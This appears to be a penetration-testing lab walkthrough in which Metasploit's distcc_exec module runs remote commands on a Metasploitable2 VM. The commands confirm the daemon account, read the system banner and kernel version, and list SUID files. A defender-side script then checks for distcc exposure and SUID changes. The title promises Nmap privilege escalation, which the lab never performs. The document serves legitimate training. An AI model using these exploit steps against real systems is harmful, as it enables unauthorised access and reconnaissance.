Perform Privilege Escalation on Linux Machine with Nmap


Introduction

In this lab, you will use Metasploit to exploit the distcc service on a vulnerable Linux target, confirm the remote execution context you obtain, and collect basic system information from that target. The workflow uses one remote command at a time from the Metasploit module prompt instead of an interactive shell session.

The distcc module on this target is reliable for remote command execution through cmd/unix/generic, but it does not open a persistent shell in this environment. The main learning goal is to recognize that behavior, verify which remote account executed each command, and continue enumerating the target with deliberate follow-up commands.

Prepare the Environment

In this step, we will start the necessary components of the lab environment, including the Kali Linux container and the Metasploitable2 virtual machine.

  1. Start the Metasploitable2 virtual machine by executing the following command in the terminal:
sudo virsh start Metasploitable2

Wait for the target machine to start; it may take 1-3 minutes.

  2. Test whether the virtual machine has started by pinging the target IP address:
ping 192.168.122.102

Press Ctrl+C to stop the ping.

  3. Start the Kali Linux container and enter its bash shell:
docker run -ti --network host b5b709a49cd5 bash

  4. Within the Kali container, test the network connectivity by pinging the target IP address:
ping 192.168.122.102

Press Ctrl+C to stop the ping.

Gain Initial Access to the Target Machine

In this step, we will use the Metasploit Framework (MSF) in the Kali container to gain initial access to the Metasploitable2 target machine.

  1. Within the Kali container, start the Metasploit console:
cd ~
msfconsole
  2. Within the Metasploit console, use the distcc_exec exploit module:
use exploit/unix/misc/distcc_exec
  3. Set the payload to generic remote command execution. In this environment, the module does not open a stable interactive shell, so you should run one remote command at a time:
set payload cmd/unix/generic
  4. Set the target host IP address:
set RHOST 192.168.122.102
  5. Set the first remote command you want to run on the target:
set CMD whoami
  6. Launch the exploit to run that command on the target machine:
run

After a successful run, you should see output similar to 192.168.122.102:3632 - stdout: daemon. That result means the command ran on the remote Metasploitable2 host as the daemon user.

Stay at the msf6 exploit(unix/misc/distcc_exec) > prompt for the next steps. For each new remote command, update CMD and run the module again.

Verify Current User Privileges

After gaining remote command execution, we need to check which account the target used for the command and whether it already has elevated privileges.

  1. If you left the distcc_exec module prompt, repeat the Metasploit setup from Step 2 so you are back at msf6 exploit(unix/misc/distcc_exec) >.

  2. Set the remote command to check the current user:

set CMD whoami
  3. Run the module to execute that command on the target:
run
  4. Set the next remote command to display the user ID and group information:
set CMD id
  5. Run the module again:
run

If the output shows stdout: daemon and uid=1(daemon) gid=1(daemon), the exploit is executing commands remotely as the daemon account rather than as root. You would need an additional privilege-escalation technique to go further, but for this lab we will stay focused on validating access and collecting reconnaissance data.

Stay at the same Metasploit module prompt for the next step.

Enumerate System Information

Now that you have confirmed your access level, gather a few details from the target system so you can identify what kind of host you compromised.

  1. If you left the distcc_exec module prompt, repeat the Metasploit setup from Step 2 so you are back at msf6 exploit(unix/misc/distcc_exec) >.

  2. Set the remote command to check the Linux distribution banner:

set CMD "cat /etc/issue"
  3. Run the module:
run

Here's an example of the output you might see from the target:

                _                  _       _ _        _     _      ____
 _ __ ___   ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __/ _` | '_ \| |/ _ \ __) |
| | | | | |  __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | |  __// __/
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____|
                            |_|

Warning: Never expose this VM to an untrusted network!
Login with msfadmin/msfadmin to get started
  4. Set the next remote command to check the kernel version:
set CMD "uname -a"
  5. Run the module again:
run

Here's an example of the output you might see from the target:

Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
  6. Set the remote command to find SUID files that could potentially be useful for later post-exploitation analysis:
set CMD "find / -perm -u=s -type f 2>/dev/null"
  7. Run the module one more time:
run

Review the list to understand which privileged binaries are present on the target. The exact entries can vary, but you should see paths such as /usr/bin/sudo and /usr/bin/nmap from the compromised host.

After you finish inspecting the output, you can exit Metasploit with exit.
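As an added example (not part of the LabEx lab, Metasploit, or Metasploitable2), the following POSIX shell script turns the checks from the last two sections into defender-side tests: it parses id output to confirm whether a command ran as root, flags a distcc listener on tcp/3632 bound to a non-loopback address (the exposure this target has), and diffs a SUID listing against a recorded baseline to surface unexpected entries. All id, ss and SUID data is constructed inline, and the baseline is hypothetical.

```shell
#!/bin/sh
# Added example, not part of the LabEx lab; every sample below is constructed.
# Constructed `id` output as distcc_exec returns it when the remote command
# runs under the distcc daemon account (uid 1 on Metasploitable2).
SAMPLE_ID='uid=1(daemon) gid=1(daemon) groups=1(daemon)'
# Constructed `ss -ltn` output: distcc on tcp/3632 bound to every interface.
SAMPLE_SS='State  Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0      10     0.0.0.0:3632       0.0.0.0:*
LISTEN 0      128    127.0.0.1:631      0.0.0.0:*'
# Hypothetical SUID baseline (record it from a known-good image in practice)
# and a current listing that contains one path the baseline lacks.
BASELINE_SUID='/bin/ping
/bin/su
/usr/bin/passwd
/usr/bin/sudo'
CURRENT_SUID='/bin/ping
/bin/su
/usr/bin/nmap
/usr/bin/passwd
/usr/bin/sudo'

# Numeric uid from an `id` line; only uid 0 is root, anything else is not.
parse_uid() {
    printf '%s\n' "$1" | sed -n 's/^uid=\([0-9]*\)(.*/\1/p'
}

# True when the `id` output shows the command ran as root.
is_root_context() {
    [ "$(parse_uid "$1")" = "0" ]
}

# True when a LISTEN socket on tcp/3632 is bound to a non-loopback address,
# i.e. distcc is reachable from the network the way the lab target is.
distcc_exposed() {
    printf '%s\n' "$1" | awk '
        $1 == "LISTEN" && $4 ~ /:3632$/ && $4 !~ /^127\./ { found = 1 }
        END { exit (found ? 0 : 1) }'
}

# Print each path in the current SUID listing ($2) that is absent from the
# baseline ($1); exact-line matching keeps /bin/su from matching /usr/bin/sudo.
unexpected_suid() {
    printf '%s\n' "$2" | while IFS= read -r path; do
        printf '%s\n' "$1" | grep -Fxq -- "$path" || printf '%s\n' "$path"
    done
}
echo "remote command ran as uid $(parse_uid "$SAMPLE_ID")"
distcc_exposed "$SAMPLE_SS" && echo "distcc is listening on a non-loopback address"
echo "SUID paths not in baseline: $(unexpected_suid "$BASELINE_SUID" "$CURRENT_SUID")"
```

On a real host, feed the script the live output of id, ss -ltn and the lab's find command instead of the constructed samples.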

Summary

In this lab, you started the LabEx environment, used the Metasploit Framework to exploit the vulnerable distcc service, and executed remote commands against the Metasploitable2 target through cmd/unix/generic. You then verified the remote execution context with whoami and id so you could confirm which account the exploit used before running follow-up commands.

You also gathered basic system information from the compromised host by checking its distribution banner, kernel version, and available SUID binaries. These post-exploitation checks are useful for confirming what access you gained and for planning further enumeration on a Linux target.